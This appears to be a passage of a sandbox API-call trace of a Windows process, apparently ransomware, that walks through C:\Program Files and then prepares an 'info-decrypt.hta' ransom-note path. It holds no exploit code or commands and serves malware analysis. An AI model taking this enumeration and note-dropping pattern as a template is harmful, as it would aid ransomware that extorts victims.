ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdbd22b00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbd22b00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0131.446] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28ae853d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28ae853d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0131.446] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdaf269c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdaf269c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DVD Maker", cAlternateFileName="DVDMAK~1")) returned 1 [0131.446] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ead9a68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0131.447] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdad11680, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdad11680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Analysis Services", cAlternateFileName="MICROS~2")) returned 1 [0131.447] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdbb7fbe0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbb7fbe0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office", cAlternateFileName="MICROS~1")) returned 1 [0131.447] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbba5d40, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbba5d40, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft SQL Server Compact Edition", cAlternateFileName="MICROS~3")) returned 1 [0131.447] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbbcbea0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbbcbea0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Sync Framework", cAlternateFileName="MICROS~4")) returned 1 [0131.447] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdcb91060, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdcb91060, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Synchronization Services", cAlternateFileName="MID7C0~1")) returned 1 [0131.448] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSBuild", cAlternateFileName="")) returned 1 [0131.448] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdbcd6840, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbcd6840, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reference Assemblies", cAlternateFileName="REFERE~1")) returned 1 [0131.448] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x4232b3dd, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0xdcb6af00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdcb6af00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Uninstall Information", cAlternateFileName="UNINST~1")) returned 1 [0131.448] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdbcfc9a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbcfc9a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~3")) returned 1 [0131.448] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e177d26, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa250a38, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e472dd2, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Journal", cAlternateFileName="WI0FCF~1")) returned 1 [0131.448] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdbbf2000, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbbf2000, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~1")) returned 1 [0131.449] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdcb6af00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdcb6af00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player", cAlternateFileName="WI54FB~1")) returned 1 [0131.449] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdcb6af00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdcb6af00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0131.449] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdbc18160, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbc18160, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Photo Viewer", cAlternateFileName="WINDOW~4")) returned 1 [0131.449] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdbd48c60, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbd48c60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Portable Devices", cAlternateFileName="WIBFE5~1")) returned 1 [0131.449] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdbcb06e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbcb06e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 1 [0131.450] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdbcb06e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbcb06e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 0 [0131.450] FindClose (in: hFindFile=0x77ac30 | out: hFindFile=0x77ac30) returned 1 [0131.450] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcf01c) returned 1 [0131.450] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcf028) returned 1 [0131.450] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcf05c) returned 1 [0131.450] GetFullPathNameW (in: lpFileName="C:\\Program Files", nBufferLength=0x105, lpBuffer=0x6bceb64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files", lpFilePart=0x0) returned 0x10 [0131.450] GetFullPathNameW (in: lpFileName="C:\\Program Files\\", nBufferLength=0x105, lpBuffer=0x6bceb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\", lpFilePart=0x0) returned 0x11 [0131.450] FindFirstFileW (in: lpFileName="C:\\Program Files\\*", lpFindFileData=0x6bced84 | out: lpFindFileData=0x6bced84*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe0a0d1e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe0a0d1e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77ac30 [0131.450] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe0a0d1e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe0a0d1e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.451] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdbd22b00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbd22b00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0131.451] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28ae853d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28ae853d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0131.451] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdaf269c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdaf269c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DVD Maker", cAlternateFileName="DVDMAK~1")) returned 1 [0131.451] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ead9a68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0131.451] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdad11680, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdad11680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Analysis Services", cAlternateFileName="MICROS~2")) returned 1 [0131.451] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdbb7fbe0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbb7fbe0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office", cAlternateFileName="MICROS~1")) returned 1 [0131.452] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbba5d40, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbba5d40, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft SQL Server Compact Edition", cAlternateFileName="MICROS~3")) returned 1 [0131.452] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbbcbea0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbbcbea0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Sync Framework", cAlternateFileName="MICROS~4")) returned 1 [0131.452] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdcb91060, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdcb91060, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Synchronization Services", cAlternateFileName="MID7C0~1")) returned 1 [0131.452] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSBuild", cAlternateFileName="")) returned 1 [0131.452] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdbcd6840, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbcd6840, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reference Assemblies", cAlternateFileName="REFERE~1")) returned 1 [0131.452] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x4232b3dd, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0xdcb6af00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdcb6af00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Uninstall Information", cAlternateFileName="UNINST~1")) returned 1 [0131.452] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdbcfc9a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbcfc9a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~3")) returned 1 [0131.452] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e177d26, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa250a38, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e472dd2, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Journal", cAlternateFileName="WI0FCF~1")) returned 1 [0131.453] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdbbf2000, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbbf2000, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~1")) returned 1 [0131.453] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdcb6af00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdcb6af00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player", cAlternateFileName="WI54FB~1")) returned 1 [0131.453] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdcb6af00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdcb6af00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0131.453] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdbc18160, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbc18160, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Photo Viewer", cAlternateFileName="WINDOW~4")) returned 1 [0131.453] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdbd48c60, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbd48c60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Portable Devices", cAlternateFileName="WIBFE5~1")) returned 1 [0131.453] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdbcb06e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbcb06e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 1 [0131.454] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x6bced94 | out: lpFindFileData=0x6bced94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0131.454] FindClose (in: hFindFile=0x77ac30 | out: hFindFile=0x77ac30) returned 1 [0131.454] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcf01c) returned 1 [0131.454] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcf028) returned 1 [0136.467] GetFullPathNameW (in: lpFileName="C:\\Program Files\\desktop.ini", nBufferLength=0x105, lpBuffer=0x6bceb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\desktop.ini", lpFilePart=0x0) returned 0x1c [0136.467] GetFullPathNameW (in: lpFileName="C:\\Program Files\\desktop.ini", nBufferLength=0x105, lpBuffer=0x6bceb14, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\desktop.ini", lpFilePart=0x0) returned 0x1c [0136.467] GetFullPathNameW (in: lpFileName="C:\\Program Files\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6bceb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\info-decrypt.hta", lpFilePart=0x0) returned 0x21 [0136.467] SetThreadErrorMode 